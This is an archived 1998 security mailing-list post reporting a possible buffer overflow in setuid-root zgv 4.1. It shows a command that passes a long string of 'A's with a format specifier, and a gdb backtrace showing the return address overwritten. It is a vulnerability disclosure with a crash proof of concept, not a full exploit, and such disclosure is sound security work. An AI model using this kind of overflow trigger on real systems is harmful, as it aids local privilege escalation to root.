Overflow in zgv-4.1?

From: onix (onixat_private)
Date: Wed Oct 07 1998 - 22:08:13 PDT

    Possible security risk in setuid zgv 4.1 which may lead to local root
    compromise.  zgv is installed setuid root by default.
    
    onix# zgv -a "`perl -e 'print "A" x 4000'`%s"
    Segmentation fault (core dumped)
    onix# gdb -c core
    GDB is free software and you are welcome to distribute copies of it
     under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for details.
    GDB 4.16 (i486-slackware-linux), Copyright 1996 Free Software Foundation,
    Inc.
    Core was generated by `zgv -a
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 11, Segmentation fault.
    #0  0x40121a48 in ?? ()
    (gdb) backtrace
    #0  0x40121a48 in ?? ()
    #1  0x41414141 in ?? ()
    Cannot access memory at address 0x41414141.
    (gdb)
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:18:57 PDT